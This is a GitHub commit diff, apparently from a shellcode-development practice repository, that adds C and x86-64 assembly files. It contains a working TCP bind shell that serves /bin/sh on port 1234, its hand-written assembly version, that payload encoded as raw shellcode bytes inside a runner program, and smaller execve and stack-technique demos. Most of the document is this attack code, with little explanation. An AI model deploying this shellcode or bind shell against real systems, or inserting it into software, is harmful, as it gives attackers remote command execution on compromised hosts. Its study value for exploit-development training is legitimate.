rwx-777
diff --git a/‎TCP_bind_Shell.c
Copy file name to clipboard
+29Lines changed: 29 additions & 0 deletions b/‎TCP_bind_Shell.c
Copy file name to clipboard
+29Lines changed: 29 additions & 0 deletions
diff --git a/‎TCP_bind_Shell.nasm
Copy file name to clipboard
+86Lines changed: 86 additions & 0 deletions b/‎TCP_bind_Shell.nasm
Copy file name to clipboard
+86Lines changed: 86 additions & 0 deletions
diff --git a/‎execve-ls.c
Copy file name to clipboard
+8Lines changed: 8 additions & 0 deletions b/‎execve-ls.c
Copy file name to clipboard
+8Lines changed: 8 additions & 0 deletions
diff --git a/‎execve-sh.c
Copy file name to clipboard
+8Lines changed: 8 additions & 0 deletions b/‎execve-sh.c
Copy file name to clipboard
+8Lines changed: 8 additions & 0 deletions
diff --git a/‎execve-sh.nasm
Copy file name to clipboard
+16Lines changed: 16 additions & 0 deletions b/‎execve-sh.nasm
Copy file name to clipboard
+16Lines changed: 16 additions & 0 deletions
diff --git a/‎execve.c
Copy file name to clipboard
+8Lines changed: 8 additions & 0 deletions b/‎execve.c
Copy file name to clipboard
+8Lines changed: 8 additions & 0 deletions
diff --git a/‎peda-session-jmp-call.txt
Copy file name to clipboard
+2Lines changed: 2 additions & 0 deletions b/‎peda-session-jmp-call.txt
Copy file name to clipboard
+2Lines changed: 2 additions & 0 deletions
diff --git a/‎shellcode-exec.c
Copy file name to clipboard
+12Lines changed: 12 additions & 0 deletions b/‎shellcode-exec.c
Copy file name to clipboard
+12Lines changed: 12 additions & 0 deletions
diff --git a/‎stack-technique.nasm
Copy file name to clipboard
+20Lines changed: 20 additions & 0 deletions b/‎stack-technique.nasm
Copy file name to clipboard
+20Lines changed: 20 additions & 0 deletions
@@ -0,0 +1,29 @@
+#include <sys/socket.h>
+#include <sys/types.h>
+#include <stdlib.h>
+#include <unistd.h>
+#include <netinet/in.h>
+
+int main(void) {
+
+	int clientfd, sockfd;
+	int port = 1234;
+	struct sockaddr_in mysockaddr;
+	
+	sockfd = socket(AF_INET, SOCK_STREAM, 0);
+	mysockaddr.sin_family = AF_INET; // can be represented in numeric as 2
+	mysockaddr.sin_port = htons(port);
+	mysockaddr.sin_addr.s_addr = INADDR_ANY; //can be represented in numeric as 0 which means bind to all interfaces
+	
+	bind(sockfd, (struct sockaddr *) &mysockaddr, sizeof(mysockaddr));
+	listen(sockfd, 1);
+
+	clientfd = accept(sockfd, NULL, NULL);
+	dup2(clientfd, 0);
+	dup2(clientfd, 1);
+	dup2(clientfd, 2);
+	char * const argv[] = {"sh",NULL,NULL};
+	execve("/bin/sh",argv, NULL);
+	return 0;
+}
+
@@ -0,0 +1,86 @@
+global _start
+
+section .text
+
+_start:
+
+;Socket syscall
+	xor rax, rax
+	add rax, 41
+	xor rdi, rdi 
+	add rdi, 2       ;stands for IPv4
+	xor rsi, rsi
+	inc rsi          ;1 stands for TCP
+	xor rdx, rdx
+	syscall
+
+;Save the sockfd in RDI register
+	mov rdi, rax
+
+;Creating the structure
+	xor rax, rax
+	push rax
+	push word 0xd204 ;port 1234
+	push word 0x02 ; AF_INET
+;Bind syscall
+	mov rsi, rsp
+	xor rdx, rdx
+	add rdx, 16
+	xor rax, rax
+	add rax, 49
+	syscall
+
+;Listen syscall
+	xor rax, rax
+	add rax, 50  ;Listen
+	xor rsi, rsi
+	inc rsi
+	syscall
+
+;Accept syscall
+	xor rax, rax
+	add rax, 43 ;Accept
+	xor rsi, rsi
+	xor rdx, rdx
+	syscall
+
+;Store clientfd in RBX register
+	mov rbx, rax
+
+;Dup2 syscall to stdin
+	mov rdi, rbx
+	xor rax, rax
+	add rax, 33     ;Dup2
+	xor rsi, rsi    ; rsi = 0 stdin
+	syscall
+
+;Dup2 syscall to stdout
+	xor rax, rax
+	add rax, 33
+	inc rsi        ;rsi = 1 stdout
+	syscall
+
+;Dup2 syscall stderr
+	xor rax, rax
+	add rax, 33
+	inc rsi	       ;rsi = 2 stderr
+	syscall
+
+;Execve syscall with /bin/sh
+	xor rax, rax
+	push rax
+	mov rdx, rsp
+	mov rbx, 0x68732f6e69622f2f
+	push rbx
+	mov rdi, rsp
+	push rax
+	push rdi
+	mov rsi, rsp
+	add rax, 59
+	syscall
+
+
+
+	
+
+	
@@ -0,0 +1,8 @@
+#include <unistd.h>
+
+int main() {
+	char * const argv[] = {"ls","/etc/",NULL};
+	execve("/bin/ls",argv, NULL);
+	return 0;
+}
+
@@ -0,0 +1,8 @@
+#include <unistd.h>
+
+int main() {
+	char * const argv[] = {"bash",NULL};
+	execve("//bin/sh",argv, NULL);
+	return 0;
+}
+
@@ -0,0 +1,16 @@
+global _start
+
+section .text
+
+_start:
+	xor rax, rax
+	push rax
+	mov rdx, rsp
+	mov rbx, 0x68732f6e69622f2f
+	push rbx
+	mov rdi, rsp
+	push rax
+	push rdi
+	mov rsi, rsp
+	add rax, 59
+	syscall
@@ -0,0 +1,8 @@
+#include <unistd.h>
+
+int main() {
+	char * const argv[] = {"cat","/etc/issue",NULL};
+	execve("/bin/cat",argv, NULL);
+	return 0;
+}
+
@@ -0,0 +1,2 @@
+break _start
+
@@ -0,0 +1,12 @@
+#include <stdio.h>
+#include <string.h>
+
+unsigned char code[] = "\x48\x31\xc0\x48\x83\xc0\x29\x48\x31\xff\x48\x83\xc7\x02\x48\x31\xf6\x48\xff\xc6\x48\x31\xd2\x0f\x05\x48\x89\xc7\x48\x31\xc0\x50\x66\x68\x04\xd2\x66\x6a\x02\x48\x89\xe6\x48\x31\xd2\x48\x83\xc2\x10\x48\x31\xc0\x48\x83\xc0\x31\x0f\x05\x48\x31\xc0\x48\x83\xc0\x32\x48\x31\xf6\x48\xff\xc6\x0f\x05\x48\x31\xc0\x48\x83\xc0\x2b\x48\x31\xf6\x48\x31\xd2\x0f\x05\x48\x89\xc3\x48\x89\xdf\x48\x31\xc0\x48\x83\xc0\x21\x48\x31\xf6\x0f\x05\x48\x31\xc0\x48\x83\xc0\x21\x48\xff\xc6\x0f\x05\x48\x31\xc0\x48\x83\xc0\x21\x48\xff\xc6\x0f\x05\x48\x31\xc0\x50\x48\x89\xe2\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x53\x48\x89\xe7\x50\x57\x48\x89\xe6\x48\x83\xc0\x3b\x0f\x05";
+
+int main() {
+	printf("Shellcode Length: %d\n",  (int)strlen(code));
+	int (*ret) () = (int(*) ())code;
+	ret();
+}
+
+
@@ -0,0 +1,20 @@
+global _start
+
+section .text
+_start:
+	xor rax, rax
+	add rax, 1
+	mov rdi, rax
+	push 0x0a646c72
+	mov rbx, 0x6f77206f6c6c6568
+	push rbx
+	mov rsi, rsp
+	xor rdx, rdx
+	add rdx, 12
+	syscall
+
+	xor rax, rax
+	add rax, 60
+	xor rdi, rdi
+	syscall
+